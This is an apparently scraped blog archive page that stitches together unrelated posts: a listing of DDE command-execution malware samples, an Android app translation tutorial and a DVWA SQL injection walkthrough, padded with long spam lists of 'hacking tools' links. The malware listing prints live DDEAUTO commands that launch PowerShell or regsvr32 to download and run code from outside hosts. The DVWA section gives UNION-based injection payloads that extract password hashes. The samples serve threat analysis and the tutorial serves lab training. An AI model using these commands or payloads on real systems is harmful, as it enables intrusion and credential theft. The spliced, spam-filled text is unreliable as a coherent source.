1 2 Ambtion.com 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 Ambtion.com 279 280 281 Advertise Free on Auto-pilot!
Watch the latest videos on YouTube.com
newgoldenjewels: January 2024

Sunday, January 28, 2024

DDE Command Execution Malware Samples




Here are a few samples related to the recent DDE Command execution










Links updated: Jan 20, 2023


References


File information
List of available files:
Word documents:
bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb
a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428
b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568
9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862
7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280
313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065
9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d
8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184
11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13
bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9

Payload 
8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf
2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c
316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea
5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f
fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 


File details with MD5 hashes:
Word documents:
1. bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb EDGAR_Rules.docx
bcadcf65bcf8940fff6fc776dd56563 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://pastebin.com/raw/pxSE2TJ1')) ")

2. 1a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428 EDGAR_Rules_2017.docx
 2c0cfdc5b5653cb3e8b0f8eeef55fc32 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://trt.doe.louisiana.gov/fonts.txt')) ")

3 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx
8be9633d5023699746936a2b073d2d67 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://104.131.178.222/s.ps1');powershell -Command $e. 

4. 9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862 Plantilla - InformesFINAL.docx
78f07a1860ae99c093cc80d31b8bef14 ( DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe $e=new-object -com internetexplorer.application; $e.visible=$true; $e.navigate2(' https://i.ytimg.com/vi/ErLLFVf-0Mw/maxresdefault.jpg '); powershell -e $e " 

5. 7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280 
 aee33500f28791f91c278abb3fcdd942 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://www.filefactory.com/file/2vxfgfitjqrf/Citibk_MT103_Ref71943.exe');powershell -e_

6. 313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065 Giveaway.docx
507784c0796ffebaef7c6fc53f321cd6 (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe" "/c regsvr32 /u /n /s /i:\"h\"t\"t\"p://downloads.sixflags-frightfest.com/ticket-ids scrobj.dll" "For Security Reasons")


7. 9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d  Filings_and_Forms.docx
47111e9854db533c328ddbe6e962602a (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden -C $e=(new-object system.net.webclient).downloadstring('http://goo.gl/Gqdihn');powershell.exe -e $e # " "Filings_and_Forms.docx")

8. 8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184 ~WRD0000.tmp
47111e9854db533c328ddbe6e962602a


9. 11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13 ~WRD0003.tmp
d78ae3b9650328524c3150bef2224460


10. bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9 DanePrzesylki17016.doc
5786dbcbe1959b2978e979bf1c5cb450


Payload Powershell

1. 8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf fonts.txt

2 2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c - powershell script from hxxp://citycarpark.my/components/com_admintools/mscorier

Payload PE

1. 316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea Citibk_MT103_Ref71943.exe
3a4d0c6957d8727c0612c37f27480f1e

2. 5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f FreddieMacPayload
 4f3a6e16950b92bf9bd4efe8bbff9a1e

3. fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 s50.exe  Poland payload
09d71f068d2bbca9fac090bde74e762b



How To Automatically Translate Any Android App Into Any Language

There is the number of applications which are not having the features of translating apps to your favorite languages. This makes it difficult for the users to translate apps into their native language. Today, I am going to tell you about an application which will help you to Automatically Translate Any Android App into Any Language.
Nowadays there are around hundreds of application on play store which is having the feature of translate but some applications don't have this features. This is just because they don't have proper developers or sometimes translators.
There is an application launched by Akhil Kedia from XDA Developer which made it possible for all the users to translate the application to any language you need. This is something which everyone needs it.
Akhil Kedia built an Xposed module in which users can easily change the language of any application to whichever they like or love. Personally, we all love English language but there are peoples in many parts of the world they are suitable for other languages.
Automatically Translate Any Android App into Any Language
Automatically Translate Any Android App into Any Language

Automatically Translate Any Android App into Any Language

The best part about this Xposed Module is that it translates the application to any language whichever you like and there are around many languages which you can try it. The other best part about this application is that the user interface which is amazing.
In an Android application, the best thing is the user interface. This is something which helps users to download the module or application to run again and again. There are about many settings which can be changed from the application.
The setup process is a bit different from other applications but if you will look at the application you will definitely love it. Just because of too many settings and features available in the application and you can turn it to any language without any crashing issues of the application.

Requirements:

  • Rooted Android Phone
  • Xposed Framework installed on your phone.
  • Android 5.0 or higher.
  • Unknown Source enabled (You might be knowing it)
How to Automatically Translate Any Android App into Any Language
  • Download the module called as All Trans from here: Download
Automatically Translate Any Android App
  • Now, after installation, it will ask you to reboot your phone to activate the module
  • Now, you need to get the API Key to get it you need to sign up with Yandex first so sign up: Yandex Sign up
Automatically Translate Any Android App
  • Then after sign up you will get the API key just enter the API key in the All-Trans application.
Automatically Translate Any Android App
  • Open All Trans Application and the swipe right to Global Settings.
Automatically Translate Any Android App
  • Click on Enter Yandex Subscription key and then enter your key.
Automatically Translate Any Android App
  • In Global Settings click on Translate from and select the Language the application is already in. (Eg: English)
Automatically Translate Any Android App
  • Now, click on translate to and select your favorite language. This will change the language.
Automatically Translate Any Android App
  • Swipe left and select the applications which you need to translate and done.
Automatically Translate Any Android App
  • After selecting just open the application and the language is translated automatically.
Automatically Translate Any Android App

Final Words:

This is the best and easy way to Automatically Translate Any Android App into Any Language. I hope you love this article.Share this article with your friends and keep visiting for more tips and tricks like this and I will meet you in the next one.
Stay Updated Tune IemHacker

More info


  1. Hacking Tools For Windows
  2. Pentest Tools List
  3. Hacker Tools Hardware
  4. Pentest Automation Tools
  5. Pentest Tools Kali Linux
  6. Easy Hack Tools
  7. Free Pentest Tools For Windows
  8. Hack Apps
  9. Hacking Tools Name
  10. Hack Tools Pc
  11. Hack Tools 2019
  12. Ethical Hacker Tools
  13. Hacking Tools Name
  14. Usb Pentest Tools
  15. New Hacker Tools
  16. Beginner Hacker Tools
  17. Hack And Tools
  18. Hacker Tools List
  19. Hacking Tools Name
  20. Pentest Tools For Ubuntu
  21. Hacker Tools Online
  22. Beginner Hacker Tools
  23. Hacker Tools Apk
  24. Pentest Tools Alternative
  25. Hacker Tools Software
  26. Hack Tools Mac
  27. Pentest Tools List
  28. How To Hack
  29. Hacker Tools Linux
  30. Hacking Tools Github
  31. Nsa Hacker Tools
  32. Pentest Box Tools Download
  33. Hack Apps
  34. Hacker Hardware Tools
  35. Best Hacking Tools 2020
  36. Pentest Tools Find Subdomains
  37. Hacking Tools Name
  38. Hacker Tools Apk
  39. Hacking Apps
  40. Hacker Tools Hardware
  41. New Hacker Tools
  42. Hacker Tools Windows
  43. Hacker Security Tools
  44. Nsa Hack Tools Download
  45. Pentest Tools For Mac
  46. Hack Tools For Games
  47. Hack And Tools
  48. Hacking Tools Github
  49. Hacking Tools For Windows Free Download
  50. Pentest Tools Find Subdomains
  51. Hacking Tools For Kali Linux
  52. Hackrf Tools
  53. Hacking Tools Free Download
  54. Hacker Tools Mac
  55. Hacking Tools Windows
  56. Hack Rom Tools
  57. Top Pentest Tools
  58. Android Hack Tools Github
  59. New Hacker Tools
  60. Pentest Tools Linux
  61. Hacker Tools For Mac
  62. Hack And Tools
  63. Bluetooth Hacking Tools Kali
  64. Hack Tools Online
  65. Hacker Tools Software
  66. Hack Tools 2019
  67. Hackrf Tools
  68. Hacking Tools Mac
  69. Hacking Tools For Mac
  70. Computer Hacker
  71. Hack Tools Download
  72. Github Hacking Tools
  73. Pentest Automation Tools
  74. Hacking Tools Hardware
  75. Free Pentest Tools For Windows
  76. Tools Used For Hacking
  77. Hacker Techniques Tools And Incident Handling
  78. Hack Tools For Ubuntu

Saturday, January 27, 2024

Learning Web Pentesting With DVWA Part 2: SQL Injection

In the last article Learning Web Pentesting With DVWA Part 1: Installation, you were given a glimpse of SQL injection when we installed the DVWA app. In this article we will explain what we did at the end of that article and much more.
Lets start by defining what SQL injection is, OWASP defines it as: "A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands."
Which basically means that we can use a simple (vulnerable) input field in our web application to get information from the database of the server which hosts the web application. We can command and control (at certain times) the database of the web application or even the server.
In this article we are going to perform SQL injection attack on DVWA, so let's jump in. On the DVWA welcome page click on SQL Injection navigation link. We are presented with a page with an input field for User ID.
Now lets try to input a value like 1 in the input field. We can see a response from server telling us the firstname and surname of the user associated with User ID 1.
If we try to enter a user id which doesn't exist, we get no data back from the server. To determine whether an input field is vulnerable to SQL injection, we first start by sending a single quote (') as input. Which returns an SQL error.
We saw this in the previous article and we also talked about injection point in it. Before diving deeper into how this vulnerability can be exploited lets try to understand how this error might have occurred. Lets try to build the SQL query that the server might be trying to execute. Say the query looks something like this:
SELECT first_name, sur_name FROM users WHERE user_id = '1';
The 1 in this query is the value supplied by the user in the User ID input field. When we input a single quote in the User ID input field, the query looks like this:
SELECT first_name, sur_name FROM users WHERE user_id = '''; 
The quotes around the input provided in the User ID input field are from the server side application code. The error is due to the extra single quote present in the query. Now if we specify a comment after the single quote like this:
'-- -
or
'#
we should get no error. Now our crafted query looks like this:
SELECT first_name, sur_name FROM users WHERE user_id = ''-- -'; 
or
SELECT first_name, sur_name FROM users WHERE user_id = ''#'; 
since everything after the # or -- - are commented out, the query will ignore the extra single quote added by the server side app and whatever comes after it and will not generate any error. However the query returns nothing because we specified nothing ('') as the user_id.
After knowing how things might be working on the server side, we will start to attack the application.
First of all we will try to determine the number of columns that the query outputs because if we try a query which will output the number of columns greater or smaller than what the original query outputs then our query is going to get an error. So we will first figure out the exact number of columns that the query outputs and we will do that with the help of order by sql statement like this:
' order by 1-- - 
This MySQL server might execute the query as:
SELECT first_name, sur_name FROM users WHERE user_id = '' order by 1-- -'; 
you get the idea now.
if we don't get any error message, we will increase the number to 2 like this:
' order by 2-- - 
still no error message, lets add another:
' order by 3-- - 
and there we go we have an error message. Which tells us the number of columns that the server query selects is 2 because it erred out at 3.
Now lets use the union select SQL statement to get information about the database itself.
' union select null, version()-- - 
You should first understand what a union select statement does and only then can you understand what we are doing here. You can read about it here.
We have used null as one column since we need to match the number of columns from the server query which is two. null will act as a dummy column here which will give no output and the second column which in our case here is the version() command will output the database version. Notice the output from the application, nothing is shown for First name since we specified null for it and the maria db version will be displayed in Surname.
Now lets check who the database user is using the user() function of mariadb:
' union select null, user()-- - 
After clicking the submit button you should be able to see the user of the database in surname.

Now lets get some information about the databases in the database.
Lets determine the names of databases from INFORMATION_SCHEMA.SCHEMATA by entering following input in the User ID field:
' union select null, SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA-- - 
This lists two databases dvwa and information_schema. information_schema is the built in database. Lets look at the dvwa database.
Get table names for dvwa database from INFORMATION_SCHEMA.TABLES
' union select null, TABLE_NAME from INFORMATION_SCHEMA.TABLES-- - 
It gives a huge number of tables that are present in dvwa database. But what we are really interested in is the users table as it is most likely to contain user passwords. But first we need to determine columns of that table and we will do that by querying INFORMATION_SCHEMA.COLUMNS like this:
' union select null, COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users'-- - 

We can see the password column in the output now lets get those passwords:
' union select user, password from users-- - 
Of-course those are the hashes and not plain text passwords. You need to crack them.
Hope you learned something about SQL injection in this article. See you next time.

References:

1. SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection
2. MySQL UNION: https://www.mysqltutorial.org/sql-union-mysql.aspx
3. Chapter 25 INFORMATION_SCHEMA Tables: https://dev.mysql.com/doc/refman/8.0/en/information-schema.html

Related articles


Hackerhubb.blogspot.com

Hackerhubb.blogspot.comRelated news
  1. Hacker Techniques Tools And Incident Handling
  2. Beginner Hacker Tools
  3. Pentest Tools Kali Linux
  4. Pentest Tools Url Fuzzer
  5. Best Hacking Tools 2020
  6. Hack Tools Online
  7. Hack Tools For Mac
  8. Hacking Tools Mac
  9. Hacking Tools Kit
  10. Pentest Recon Tools
  11. Pentest Tools Kali Linux
  12. Pentest Tools Tcp Port Scanner
  13. Pentest Tools Tcp Port Scanner
  14. Hack Tools Mac
  15. Hack Apps
  16. Hacker Tools Windows
  17. Pentest Tools Github
  18. Hacking Tools Name
  19. Pentest Tools For Windows
  20. Hack Website Online Tool
  21. What Is Hacking Tools
  22. Hack Tool Apk No Root
  23. Hack App
  24. Beginner Hacker Tools
  25. Physical Pentest Tools
  26. Hacker Tools For Mac
  27. Pentest Tools Download
  28. Hacking Tools For Beginners
  29. Underground Hacker Sites
  30. Tools Used For Hacking
  31. Hacker Tools For Mac
  32. Hack Website Online Tool
  33. Pentest Tools For Android
  34. Hack Rom Tools
  35. Blackhat Hacker Tools
  36. How To Hack
  37. Hacker Tools Linux
  38. Hacking Tools And Software
  39. Tools Used For Hacking
  40. Pentest Tools Bluekeep
  41. Hacker Tools Hardware
  42. Hacker Tools Hardware
  43. Hak5 Tools
  44. Black Hat Hacker Tools
  45. Best Hacking Tools 2019
  46. Pentest Tools For Windows
  47. Hackrf Tools
  48. Hack Tools Online
  49. Hack Tools
  50. Pentest Reporting Tools
  51. Hack Rom Tools
  52. How To Hack
  53. Termux Hacking Tools 2019
  54. Pentest Tools Apk
  55. Hacker Tools Windows
  56. Game Hacking
  57. Underground Hacker Sites
  58. Nsa Hack Tools Download
  59. Tools For Hacker
  60. Hacker Tools For Windows
  61. Hack Rom Tools
  62. Pentest Tools Android
  63. Pentest Tools Alternative
  64. Hacking App
  65. Pentest Tools Nmap
  66. Hacker Tools 2020
  67. Hacker Tools Mac
  68. Hack Tools
  69. Pentest Tools Nmap
  70. Hack Tools 2019
  71. Pentest Reporting Tools
  72. Hacking Tools For Mac
  73. Pentest Tools Port Scanner
  74. Hacker Tools 2019
  75. Pentest Tools Windows
  76. Hacker Tools Apk
  77. Pentest Tools List
  78. Free Pentest Tools For Windows
  79. Hacker Tools For Ios
  80. Ethical Hacker Tools
  81. Pentest Tools For Ubuntu
  82. Free Pentest Tools For Windows
  83. Hacking Tools For Windows 7
  84. Hacking Tools 2019
  85. Hacker Tools Apk Download
  86. Hack Tool Apk No Root
  87. Pentest Tools Github
  88. Pentest Tools For Ubuntu
  89. What Is Hacking Tools
  90. Pentest Tools
  91. Hacking Tools Usb
  92. Hacker Tools Free Download
  93. Hacker Techniques Tools And Incident Handling
  94. Tools 4 Hack
  95. Hack App
  96. Pentest Tools Port Scanner
  97. Termux Hacking Tools 2019
  98. Hacker Tools Free Download
  99. Nsa Hack Tools
  100. Install Pentest Tools Ubuntu
  101. Pentest Tools Port Scanner
  102. Pentest Tools Free
  103. Hacking Tools 2020
  104. Hacker Tools Free
  105. Usb Pentest Tools
  106. New Hacker Tools
  107. Tools For Hacker
  108. Hack Website Online Tool
  109. Best Hacking Tools 2019
  110. How To Make Hacking Tools
  111. Hacker Tools Mac
  112. Wifi Hacker Tools For Windows
  113. Hack Tools
  114. Pentest Tools Framework
  115. Blackhat Hacker Tools
  116. How To Hack
  117. Physical Pentest Tools
  118. Hacker Tools Github
  119. Hacking Tools Github
  120. World No 1 Hacker Software
  121. Github Hacking Tools
  122. Hack Tools
  123. Hack Tools For Games
  124. Free Pentest Tools For Windows
  125. Termux Hacking Tools 2019
  126. Nsa Hacker Tools
  127. Black Hat Hacker Tools
  128. Hacking Tools For Mac
  129. Hacker Tools 2019
  130. Computer Hacker
  131. Android Hack Tools Github
  132. Hacker Tool Kit
  133. Install Pentest Tools Ubuntu
  134. Hacking Tools 2019
  135. Termux Hacking Tools 2019
  136. Hack Tools Pc
  137. Pentest Tools Port Scanner
  138. Pentest Tools For Android
  139. Growth Hacker Tools
  140. Hack Website Online Tool
  141. What Is Hacking Tools
  142. New Hacker Tools
  143. Tools Used For Hacking
  144. Pentest Automation Tools
  145. Nsa Hacker Tools
  146. Hacking App
  147. Hacking Tools Pc
  148. Best Hacking Tools 2019
  149. Hacker Tool Kit
  150. Underground Hacker Sites
  151. Hack Tools Pc
  152. Pentest Tools Review
  153. Pentest Tools Download
  154. Hacking Tools For Beginners
  155. Pentest Tools List
  156. Black Hat Hacker Tools
  157. Pentest Tools Review
  158. Hacking Tools Hardware
  159. Android Hack Tools Github
  160. Hacking Tools For Pc
  161. Hacking Tools Usb
  162. How To Install Pentest Tools In Ubuntu
  163. Pentest Tools Bluekeep
  164. Hacking Tools For Kali Linux
  165. Hacker Security Tools
  166. Hacking Tools 2019
  167. Pentest Tools Kali Linux
  168. Hack Tools
  169. Pentest Tools
  170. Hack Tools Online
  171. Pentest Tools Tcp Port Scanner
  172. Install Pentest Tools Ubuntu
  173. Best Pentesting Tools 2018
  174. Pentest Tools Tcp Port Scanner
  175. Hacking Tools Mac
  176. Hacking Tools For Windows
  177. Hak5 Tools
  178. Hack Apps